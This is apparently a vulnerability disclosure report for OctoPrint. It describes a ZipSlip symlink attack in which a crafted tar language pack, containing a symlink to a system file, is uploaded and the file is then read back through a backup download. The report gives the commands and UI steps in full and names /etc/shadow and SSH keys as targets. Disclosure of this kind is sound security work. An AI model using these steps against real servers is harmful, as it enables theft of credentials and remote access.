ZipSlip Symlink variant allows to read any file within OctoPrint Box in octoprint/octoprint
Aug 24th 2022
Using the ZipSlip symlink variant, it is possible to steal any file from the OctoPrint remote server via an upload of a maliciously crafted archive as a language pack and download the stolen files within a backup archive.
To set up the Octoprint web application, we used the dockerized version
sudo docker volume create octoprint
sudo docker run -d -v octoprint:/octoprint -p 80:80 --name octoprint octoprint/octoprint
Generate a maliciously crafted archive as follow:
# unzip the language pack for italian
# generate a symlink as shown below, notice the difference between ../ and ./
ln -s ././../../../../../../../../../etc/issue issue.y3
# add it to a maliciously crafted TAR archive
tar -cvf it_crafted.tar ./it/
After initial configuration with default parameters, login and head to OctoPrint Settings > Octoprint Appearance > Language Packs. Click on Manage > Upload additional Language Packs. Upload the
it_crafted.tar archive as a language pack.
Now, head to Octoprint settings > Backup & Restore. Click on Create backup now. Download the new backup archive. Read the content of the file located within the backup archive at
/basedir/translations/it/LC_MESSAGES/issue.y3. You will get the server-side issue file.
An impact would be to steal
/etc/shadow and decrypt passwords or steal files within
~/.ssh to remotely access the Octoprint box.